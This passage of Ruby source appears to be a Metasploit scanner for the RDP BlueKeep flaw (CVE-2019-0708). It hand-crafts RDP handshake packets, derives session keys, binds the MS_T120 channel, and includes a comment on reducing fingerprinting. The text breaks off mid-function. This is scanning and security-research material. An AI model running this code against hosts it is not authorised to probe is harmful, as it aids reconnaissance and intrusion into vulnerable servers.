        OptString.new('RDP_USER', [ false, 'The username to report during connection.']),
        OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']),
        OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389])
      ]
    )
  end

  # ------------------------------------------------------------------------- #

  ## Hex-encode a binary string: two lowercase hex digits per byte, no separators.
  def bin_to_hex(s)
    return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join)
  end

  ## Convert a byte string into an unsigned Integer.
  ## order == "little" (the default) treats the first byte as least significant,
  ## which is how the RSA fields in the server certificate are laid out; any
  ## other value reads the bytes big-endian.
  def bytes_to_bignum(bytesIn, order = "little")
    bytes = bin_to_hex(bytesIn)
    if(order == "little")
      bytes = bytes.scan(/../).reverse.join('')
    end
    s = "0x" + bytes
    return(s.to_i(16))
  end

  ## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
  ## Serialise a non-negative Integer as a little-endian byte string of
  ## num_chars bytes. Widths 1/2/4 go through pack('C'/'S'/'L'); those codes
  ## are *native* byte order, so the result is little-endian only on a
  ## little-endian host. Any other width is built by shifting.
  ## NOTE(review): when num_chars is omitted it is derived from log2(daInt),
  ## which under-counts for exact powers of two (256 -> 1 byte -> pack('C')
  ## silently truncates to "\x00") and raises Math::DomainError for daInt <= 0.
  ## Callers should pass num_chars explicitly.
  def int_to_bytestring(daInt, num_chars = nil)
    unless(num_chars)
      bits_needed = Math.log(daInt) / Math.log(2)
      num_chars = (bits_needed / 8.0).ceil
    end
    if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ])
      [daInt].pack(pack_code)
    else
      # Emits num_chars + 1 bytes, then drops the last one.
      a = (0..(num_chars)).map{ | i | (( daInt >> i*8 ) & 0xFF ).chr }.join
      a[0..-2] # Seems legit lol!
    end
  end

  ## Open the TCP socket to RHOST:RPORT and disable Nagle so the small RDP
  ## PDUs are sent immediately. Returns true on success; on any of the listed
  ## connection errors logs the message and returns false.
  def open_connection()
    begin
      connect()
      sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
    rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      vprint_error("Connection error: #{e.message}")
      return(false)
    end
    return(true)
  end

  ## Raw RSA: bignum ^ rsexp mod rsmod, with no padding applied. This is
  ## presumably what the Standard RDP Security client-random exchange expects
  ## (verify against MS-RDPBCGR 5.3.4) - do not reuse it as a general RSA
  ## primitive.
  ## NOTE(review): the full power is computed before reducing; with a 65537
  ## exponent that is a very large intermediate. Integer#pow(rsexp, rsmod)
  ## (Ruby >= 2.5) is the modular form.
  def rsa_encrypt(bignum, rsexp, rsmod)
    return((bignum ** rsexp) % rsmod)
  end

  # ------------------------------------------------------------------------- #

  ## Used to abruptly abort scanner for a given host.
  class RdpCommunicationError < StandardError
  end

  ## Define standard RDP constants.
  class RDPConstants
    PROTOCOL_RDP = 0 # requestedProtocols: Standard RDP Security (no TLS / CredSSP)
  end

  ## Static virtual channel list for the client's MCS Connect Initial.
  ## MS_T120 is the channel at the heart of CVE-2019-0708 - binding it here,
  ## outside the slot the server reserves for it, is what the module
  ## description refers to. channelCount (4) must match the entries below.
  DEFAULT_CHANNELS_DEFS =
    "\x04\x00\x00\x00" +                      # channelCount: 4
    ## Channels definitions consist of a name (8 bytes) and options flags
    ## (4 bytes). Names are up to 7 ANSI characters with null termination.
    "\x72\x64\x70\x73\x6e\x64\x00\x00" +      # rdpsnd
    "\x0f\x00\x00\xc0" +
    "\x63\x6c\x69\x70\x72\x64\x72\x00" +      # cliprdr
    "\x00\x00\xa0\xc0" +
    "\x64\x72\x64\x79\x6e\x76\x63" +          # drdynvc
    "\x00\x00\x00\x80\xc0" +
    "\x4d\x53\x5f\x54\x31\x32\x30" +          # MS_T120
    "\x00\x00\x00\x00\x00"

  ## Builds x.224 Data (DT) TPDU - Section 13.7
  ## Wraps +data+ in a TPKT header and an X.224 Data TPDU. The TPKT length
  ## counts the whole PDU, including the 4-byte TPKT header and the 3-byte
  ## X.224 header - hence +7.
  def rdp_build_data_tpdu(data)
    tpkt_length = data.length + 7
    "\x03\x00" +                              # TPKT Header version 03, reserved 0
    [tpkt_length].pack("S>") +                # TPKT length
    "\x02\xf0" +                              # X.224 Data TPDU (2 bytes)
    "\x80" +                                  # X.224 End Of Transmission (0x80)
    data
  end

  ## Build the X.224 packet, encrypt with Standard RDP Security as needed.
  ## Default channel_id = 0x03eb = 1003.
  ##
  ## Produces an MCS SendDataRequest carrying +data+ on +channel_id+. With
  ## rdp_sec (default true) the payload gets a security header, an 8-byte MAC
  ## (rdp_hmac over the plaintext, truncated) and is then RC4-encrypted with
  ## +rc4enckey+ - so both key arguments must be supplied in that case; the
  ## nil defaults only work with rdp_sec = false. client_info adds
  ## SEC_INFO_PKT to the flags for the Client Info PDU.
  def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true)
    flags = 0
    flags |= 0b1000 if(rdp_sec)           # Set SEC_ENCRYPT (0x0008)
    flags |= 0b1000000 if(client_info)    # Set SEC_INFO_PKT (0x0040)

    pdu = ""

    ## TS_SECURITY_HEADER - 2.2.8.1.1.2.1
    ## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs.
    if(client_info || rdp_sec)
      pdu << [flags].pack("S<")       # flags "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
      pdu << "\x00\x00"               # flagsHi
    end

    if(rdp_sec)
      ## Encrypt the payload with RDP Standard Encryption.
      pdu << rdp_hmac(hmackey, data)[0..7]
      pdu << rdp_rc4_crypt(rc4enckey, data)
    else
      pdu << data
    end

    user_data_len = pdu.length
    udl_with_flag = 0x8000 | user_data_len   # high bit set: two-byte length form (presumably PER) - verify

    pkt = "\x64"                      # sendDataRequest
    pkt << "\x00\x08"                 # intiator userId (TODO: for a functional client this isn't static)
    pkt << channel_id                 # channelId
    pkt << "\x70"                     # dataPriority
    pkt << [udl_with_flag].pack("S>")
    pkt << pdu

    return(rdp_build_data_tpdu(pkt))
  end

  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
  ## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
  ## Prefixes +data+ with a 6-byte share control header of the given pduType.
  def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03")
    total_len = data.length + 6
    return(
      [total_len].pack("S<") +        # totalLength - includes all headers
      [type].pack("S<") +             # pduType - flags 16 bit, unsigned
      channel_id +                    # PDUSource: 0x03f1 = 1009
      data
    )
  end

  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
  ## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
  ## Prefixes +data+ with a 12-byte share data header (uncompressed, fixed
  ## shareId and streamID) of the given pduType2.
  def rdp_build_share_data_header(type, data)
    uncompressed_len = data.length + 4
    return(
      "\xea\x03\x01\x00" +            # shareId: 66538
      "\x00" +                        # pad1
      "\x01" +                        # streamID: 1
      [uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int
      [type].pack("C") +              # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
      "\x00" +                        # compressedType: 0
      "\x00\x00" +                    # compressedLength: 0
      data
    )
  end

  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
  ## Virtual Channel PDU 2.2.6.1
  ## 8-byte static virtual channel header (length, flags) followed by +data+.
  def rdp_build_virtual_channel_pdu(flags, data)
    data_len = data.length
    return(
      [data_len].pack("L<") +         # length
      [flags].pack("L<") +            # flags
      data
    )
  end

  ## Derive the Standard RDP Security session keys from the 32-byte client
  ## and server randoms (MS-RDPBCGR 5.3.5 key-generation algorithm).
  ## Returns, in order:
  ##   initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob
  ## Only the 128-bit variant is derived here; there is no 40/56-bit
  ## reduction step.
  def rdp_calculate_rc4_keys(client_random, server_random)
    ## preMasterSecret =
    ## First192Bits(ClientRandom) + First192Bits(ServerRandom).
    preMasterSecret = client_random[0..23] + server_random[0..23]

    ## PreMasterHash(I) = SaltedHash(preMasterSecret, I)
    ## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343).
    masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) +
                   rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) +
                   rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random)

    ## MasterHash(I) = SaltedHash(MasterSecret, I)
    ## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A).
    sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) +
                     rdp_salted_hash(masterSecret, "YY", client_random, server_random) +
                     rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random)

    ## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)).
    initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)

    ## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)).
    initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)

    ## MACKey128 = First128Bits(SessionKeyBlob).
    macKey = sessionKeyBlob[0..15]

    return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob
  end

  ## Send the X.224 Connection Request (Standard RDP Security requested) and
  ## look for a Connection Confirm. Returns true when the reply contains the
  ## "\x00\x12\x34\x00" marker, false otherwise (including no reply).
  ## NOTE(review): the marker test is a heuristic (see the TODO); it looks
  ## like the 0x1234 reference echoed back from the request - confirm against
  ## pdu_negotiation_request before relying on it.
  def rdp_connection_initiation()
    ## Code to check if RDP is open or not.
    vprint_status("Verifying RDP protocol...")
    vprint_status("Attempting to connect using RDP security")
    rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP))
    received = sock.get_once(-1, 5)

    ## TODO: fix it.
    if (received and received.include? "\x00\x12\x34\x00")
      return(true)
    end
    return(false)
  end

  ## FinalHash(K) = MD5(K + ClientRandom + ServerRandom).
def rdp_final_hash(k, client_random_bytes, server_random_bytes)
  ## Returns the 16 raw MD5 digest bytes (the hexdigest re-packed with "H*").
  md5 = Digest::MD5.new
  md5 << k
  md5 << client_random_bytes
  md5 << server_random_bytes
  return([md5.hexdigest].pack("H*"))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
## Standard-encryption MAC: MD5(key + pad2 + SHA1(key + pad1 + len32 + data)).
## Only the first 8 bytes of the result travel on the wire (see rdp_build_pkt).
## Worked example, handy as a regression vector when touching this method:
## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: "22d5aeb486994a0c785dc929a2855923".
def rdp_hmac(mac_salt_key, data_content)
  sha1 = Digest::SHA1.new
  md5 = Digest::MD5.new
  pad1 = "\x36" * 40
  pad2 = "\x5c" * 48
  sha1 << mac_salt_key
  sha1 << pad1
  ## NOTE(review): the directive is written '<L' while the rest of this file
  ## uses "L<". Ruby only accepts the endianness modifier after the type
  ## letter; a leading '<' is an unknown directive (ignored with a warning on
  ## older interpreters, rejected on newer ones), so this packs a native-endian
  ## 32-bit length. Should read pack('L<') - confirm against the test vector above.
  sha1 << [data_content.length].pack('<L')
  sha1 << data_content
  md5 << mac_salt_key
  md5 << pad2
  md5 << [sha1.hexdigest].pack("H*")
  return([md5.hexdigest].pack("H*"))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c
## Parse Server MCS Connect Response PDU - 2.2.1.4
## Walks the server data blocks (2-byte type, 2-byte length) that start at
## offset 0x49 and pulls the server random, RSA public exponent and modulus out
## of the security block (type 0x0c02). Returns
## [modulus, exponent, server_random] as bignums plus the raw server_random
## and the modulus length in bytes.
## NOTE(review): every length here comes from the server. A block with
## header_length == 0 makes `ptr += header_length` stop advancing (endless loop),
## a truncated packet makes the slice return nil before unpack, and a response
## with no 0x0c02 block reaches bytes_to_bignum with nil arguments. Worth
## bounding/validating if this is ever reused outside the scanner.
def rdp_parse_connect_response(pkt)
  ptr = 0
  rdp_pkt = pkt[0x49..pkt.length]
  while(ptr < rdp_pkt.length)
    header_type = rdp_pkt[ptr..ptr + 1]
    header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0]
    # vprint_status("header: #{bin_to_hex(header_type)}, len: #{header_length}")
    if(header_type == "\x02\x0c")
      # vprint_status("Security header")
      server_random = rdp_pkt[ptr + 20..ptr + 51]
      public_exponent = rdp_pkt[ptr + 84..ptr + 87]
      modulus = rdp_pkt[ptr + 88..ptr + 151]
      # vprint_status("modulus_old: #{bin_to_hex(modulus)}")
      rsa_magic = rdp_pkt[ptr + 68..ptr + 71]
      if(rsa_magic != "RSA1")
        print_error("Server cert isn't RSA, this scenario isn't supported (yet).")
        raise RdpCommunicationError
      end
      # vprint_status("RSA magic: #{rsa_magic}")
      ## keylen field includes 8 bytes of padding; bitlen is really a byte count.
      bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8
      vprint_status("RSA #{bitlen}-bits")
      ## Re-slice the modulus to the advertised key length (the 64-byte slice
      ## above only fits a 512-bit key).
      modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen]
      # vprint_status("modulus_new: #{bin_to_hex(modulus)}")
    end
    ptr += header_length
  end
  # vprint_status("SERVER_MODULUS: #{bin_to_hex(modulus)}")
  # vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}")
  # vprint_status("SERVER_RANDOM: #{bin_to_hex(server_random)}")
  rsmod = bytes_to_bignum(modulus)
  rsexp = bytes_to_bignum(public_exponent)
  rsran = bytes_to_bignum(server_random)
  vprint_status("MODULUS: #{bin_to_hex(modulus)} - #{rsmod.to_s}")
  vprint_status("EXPONENT: #{bin_to_hex(public_exponent)} - #{rsexp.to_s}")
  vprint_status("SVRANDOM: #{bin_to_hex(server_random)} - #{rsran.to_s}")
  return rsmod, rsexp, rsran, server_random, bitlen
end

## Thin wrapper around the RC4 object's encrypt; the cipher state advances
## with every call, so call order matters.
def rdp_rc4_crypt(rc4obj, data)
  rc4obj.encrypt(data)
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f
## SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))
## Returns the 16 raw digest bytes.
def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes)
  sha1 = Digest::SHA1.new
  md5 = Digest::MD5.new
  sha1 << i_bytes
  sha1 << s_bytes
  sha1 << client_random_bytes
  sha1 << server_random_bytes
  md5 << s_bytes
  md5 << [sha1.hexdigest].pack("H*")
  return([md5.hexdigest].pack("H*"))
end

## Reads one TPKT-framed message: the 4-byte header, then as many bytes as the
## big-endian length at offset 2 announces. Raises RdpCommunicationError when
## either read times out (get_once returns nil after 5 seconds).
## NOTE(review): the TPKT length field presumably counts the 4-byte header as
## well, in which case the second read asks for 4 more bytes than this message
## holds and only works because get_once returns what is available - verify.
def rdp_recv()
  buffer_1 = sock.get_once(4, 5)
  raise RdpCommunicationError unless buffer_1 # nil due to a timeout
  buffer_2 = sock.get_once(buffer_1[2..4].unpack("S>")[0], 5)
  raise RdpCommunicationError unless buffer_2 # nil due to a timeout
  vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}")
  return(buffer_1 + buffer_2)
end

## Writes raw bytes to the socket, logging a hex dump in verbose mode.
def rdp_send(data)
  vprint_status("Send data: #{bin_to_hex(data)}")
  sock.put(data)
end

## Send one message and return the next TPKT-framed reply.
def rdp_sendrecv(data)
  rdp_send(data)
  return(rdp_recv())
end

# ------------------------------------------------------------------------- #

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
## Client X.224 Connect Request PDU - 2.2.1.1
## Builds the TPKT + X.224 connection request carrying the mstshash cookie and
## the requestedProtocols negotiation field.
def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP)
  ## Blank username is valid, nil is random.
  user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?)
  ## Both lengths grow with the cookie; the constants are the fixed part.
  tpkt_len = user_name.length + 38
  x224_len = user_name.length + 33
  return(
    "\x03\x00" + # TPKT Header version 03, reserved 0
    [tpkt_len].pack("S>") + # TPKT length: 43
    [x224_len].pack("C") + # X.224 LengthIndicator
    "\xe0" + # X.224 Type: Connect Request
    "\x00\x00" + # dst reference
    "\x00\x00" + # src reference
    "\x00" + # class and options
    "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash='
    user_name + # Identifier "username"
    "\x0d\x0a" + # cookie terminator
    "\x01\x00" + # Type: RDP Negotiation Request (0x01)
    "\x08\x00" + # Length
    [requested_protocols].pack('L<') # requestedProtocols
  )
end

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
## Client MCS Connect Initial PDU. Builds the BER/PER encoded connect-initial
## with a mostly static client core / cluster / security / network block, then
## patches the embedded length fields in place at the end (see "Fix." below),
## so the literal lengths in the comments are only approximate.
def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS)
  ## After negotiating TLS or NLA the connectInitial packet needs to include the
  ## protocol selection that the server indicated in its negotiation response.
  ## TODO: If this is pulled into an RDP library then the channel list likely
  ## needs to be built dynamically. For example, MS_T120 likely should only
  ## ever be sent as part of checks for CVE-2019-0708.

  ## build clientName - 2.2.1.3.2 Client Core Data (TS_UD_CS_CORE)
  ## 15 characters + null terminator, converted to unicode
  ## fixed length - 32 characters total
  ## (`type = 'utf-16le'` is a local assignment used as a positional argument,
  ## not a keyword argument.)
  name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le')
  name_unicode += "\x00" * (32 - name_unicode.length)

  pdu = "\x7f\x65" + # T.125 Connect-Initial (BER: Application 101)
    "\x82\x01\xb2" + # Length (BER: Length)
    "\x04\x01\x01" + # CallingDomainSelector: 1 (BER: OctetString)
    "\x04\x01\x01" + # CalledDomainSelector: 1 (BER: OctetString)
    "\x01\x01\xff" + # upwardFlag: True (BER: boolean)
    ## Connect-Initial: Target Parameters
    "\x30\x19" + # TargetParameters (BER: SequenceOf)
    ## *** not sure why the BER encoded Integers below have 2 byte values instead of one ***
    "\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
    ## Connect-Initial: Minimum Parameters
    "\x30\x19" + # MinimumParameters (BER: SequenceOf)
    "\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" +
    ## Connect-Initial: Maximum Parameters
    "\x30\x1c" + # MaximumParameters (BER: SequenceOf)
    "\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
    ## Connect-Initial: UserData
    "\x04\x82\x01\x51" + # UserData, length 337 (BER: OctetString)
    ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
    "\x00\x05" + # object length
    "\x00\x14\x7c\x00\x01" + # object: OID 0.0.20.124.0.1 = Generic Conference Control
    "\x81\x48" + # Length: ??? (Connect PDU)
    "\x00\x08\x00\x10\x00\x01\xc0\x00" + # T.124 Connect PDU, Conference name 1
    "\x44\x75\x63\x61" + # h221NonStandard: 'Duca' (client-to-server H.221 key)
    "\x81\x3a" + # Length: ??? (T.124 UserData section)
    ## Client MCS Section - 2.2.1.3
    "\x01\xc0" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2
    "\xea\x00" + # Length: 234 (includes header)
    "\x0a\x00\x08\x00" + # version: 8.1 (RDP 5.0 -> 8.1)
    "\x80\x07" + # desktopWidth: 1920
    "\x38\x04" + # desktopHeight: 1080
    "\x01\xca" + # colorDepth: 8 bpp
    "\x03\xaa" + # SASSequence: 43523
    "\x09\x04\x00\x00" + # keyboardLayout: 1033 (English US)
    "\xee\x42\x00\x00" + # clientBuild: ????
    [name_unicode].pack("a*") + # clientName
    "\x04\x00\x00\x00" + # keyboardType: 4 (IBMEnhanced 101 or 102)
    "\x00\x00\x00\x00" + # keyboardSubtype: 0
    "\x0c\x00\x00\x00" + # keyboardFunctionKey: 12
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # imeFileName (64 bytes)
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x01\xca" + # postBeta2ColorDepth: 8 bpp
    "\x01\x00" + # clientProductID: 1
    "\x00\x00\x00\x00" + # serialNumber: 0
    "\x18\x00" + # highColorDepth: 24 bpp
    "\x0f\x00" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp)
    "\xaf\x07" + # earlyCapabilityFlags
    "\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" + # clientDigProductID (64 bytes)
    "\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" +
    "\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" +
    "\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" +
    "\x07" + # connectionType: 7
    "\x00" + # pad1octet
    ## serverSelectedProtocol - After negotiating TLS or CredSSP this value
    ## must match the selectedProtocol value from the server's Negotiate
    ## Connection confirm PDU that was sent before encryption was started.
    [selected_proto].pack('L<') + # "\x01\x00\x00\x00"
    "\x56\x02\x00\x00" +
    "\x50\x01\x00\x00" +
    "\x00\x00" +
    "\x64\x00\x00\x00" +
    "\x64\x00\x00\x00" +
    "\x04\xc0" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5
    "\x0c\x00" + # Length: 12 (includes header)
    "\x15\x00\x00\x00" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)
    "\x00\x00\x00\x00" + # RedirectedSessionID
    "\x02\xc0" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3
    "\x0c\x00" + # Length: 12 (includes header)
    "\x1b\x00\x00\x00" + # encryptionMethods: 3 (40 bit | 128 bit)
    "\x00\x00\x00\x00" + # extEncryptionMethods (French locale only)
    "\x03\xc0" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4
    "\x38\x00" + # Length: 56 (includes header)
    channels_defs

  ## Fix. for packet modification.
  ## The offsets below are fixed positions inside the literal above; the
  ## computed values are the remaining byte counts after each length field.
  ## T.125 Connect-Initial
  size_1 = [pdu.length - 5].pack("s") # Length (BER: Length)
  pdu[3] = size_1[1]
  pdu[4] = size_1[0]

  ## Connect-Initial: UserData
  size_2 = [pdu.length - 102].pack("s") # UserData, length (BER: OctetString)
  pdu[100] = size_2[1]
  pdu[101] = size_2[0]

  ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
  size_3 = [pdu.length - 111].pack("s") # Length (Connect PDU)
  pdu[109] = "\x81"
  pdu[110] = size_3[0]

  size_4 = [pdu.length - 125].pack("s") # Length (T.124 UserData section)
  pdu[123] = "\x81"
  pdu[124] = size_4[0]

  ## Client MCS Section - 2.2.1.3
  size_5 = [pdu.length - 383].pack("s") # Length (includes header)
  pdu[385] = size_5[0]

  rdp_build_data_tpdu(pdu)
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
## Client Security Exchange PDU - 2.2.1.10
## RSA-encrypts the client random with the server's public key and wraps it in
## a sendDataRequest on channel 1003. bitlen is the modulus length in bytes as
## returned by rdp_parse_connect_response.
def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
  encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
  encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)

  bitlen += 8 # Pad with size of TS_SECURITY_PACKET header

  ## userData length is a 15-bit value: high bits go into the flags byte
  ## together with the 0x80 "length follows" marker.
  userdata_length = 8 + bitlen
  userdata_length_low = userdata_length & 0xFF
  userdata_length_high = userdata_length / 256
  flags = 0x80 | userdata_length_high

  pdu = "\x64" + # T.125 sendDataRequest
    "\x00\x08" + # intiator userId
    "\x03\xeb" + # channelId = 1003
    "\x70" + # dataPriority = high, segmentation = begin | end
    [flags].pack("C") +
    [userdata_length_low].pack("C") + # UserData length
    # TS_SECURITY_PACKET - 2.2.1.10.1
    "\x01\x00" + # securityHeader flags
    "\x00\x00" + # securityHeader flagsHi
    [bitlen].pack("L<") + # TS_ length
    encrypted_rcran + # encryptedClientRandom - 64 bytes
    "\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present)

  return(rdp_build_data_tpdu(pdu))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
## Client MCS Erect Domain Request PDU - 2.2.1.5
def pdu_erect_domain_request()
  pdu = "\x04" + # T.125 ErectDomainRequest
    "\x01\x00" + # subHeight - length 1, value 0
    "\x01\x00" # subInterval - length 1, value 0

  return(rdp_build_data_tpdu(pdu))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247
## Client MCS Attach User Request PDU - 2.2.1.6
def pdu_attach_user_request()
  pdu = "\x28" # T.125 AttachUserRequest

  return(rdp_build_data_tpdu(pdu))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
## Client MCS Channel Join Request PDU - 2.2.1.8
## user1 and channel_id are both packed big-endian 16-bit.
def pdu_channel_request(user1, channel_id)
  pdu = "\x38" + [user1, channel_id].pack("nn") # T.125 ChannelJoinRequest

  return(rdp_build_data_tpdu(pdu))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
## TS_INFO_PACKET - 2.2.1.11.1.1
## Builds the (unencrypted here) client info packet: domain / user name in
## UTF-16LE with empty password, shell and working dir, followed by a static
## TS_EXTENDED_INFO_PACKET. The caller encrypts it via rdp_build_pkt.
def pdu_client_info(user_name, domain_name = "", ip_address = "")
  ## Max. len for 4.0/6.0 servers is 44 bytes including terminator.
  ## Max. len for all other versions is 512 including terminator.
  ## We're going to limit to 44 (21 chars + null -> unicode) here.
  ## Blank username is valid, nil = random.
  user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
  user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le')
  uname_len = user_unicode.length

  ## Domain can be, and for rdesktop typically is, empty.
  ## Max. len for 4.0/5.0 servers is 52 including terminator.
  ## Max. len for all other versions is 512 including terminator.
  ## We're going to limit to 52 (25 chars + null -> unicode) here.
  domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le')
  domain_len = domain_unicode.length

  ## This address value is primarily used to reduce the fields by which this
  ## module can be fingerprinted. It doesn't show up in Windows logs.
  ## clientAddress + null terminator
  ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00"
  ip_len = ip_unicode.length

  pdu = "\xa1\xa5\x09\x04" +
    "\x09\x04\xbb\x47" + # CodePage
    "\x03\x00\x00\x00" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
    [domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator
    [uname_len].pack("S<") + # cbUserName (length value) - EXCLUDES null terminator
    "\x00\x00" + # cbPassword (length value)
    "\x00\x00" + # cbAlternateShell (length value)
    "\x00\x00" + # cbWorkingDir (length value)
    [domain_unicode].pack("a*") + # Domain
    "\x00\x00" + # Domain null terminator, EXCLUDED from value of cbDomain
    [user_unicode].pack("a*") + # UserName
    "\x00\x00" + # UserName null terminator, EXCLUDED FROM value of cbUserName
    "\x00\x00" + # Password - empty
    "\x00\x00" + # AlternateShell - empty
    ## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
    "\x02\x00" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
    [ip_len].pack("S<") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
    [ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode)
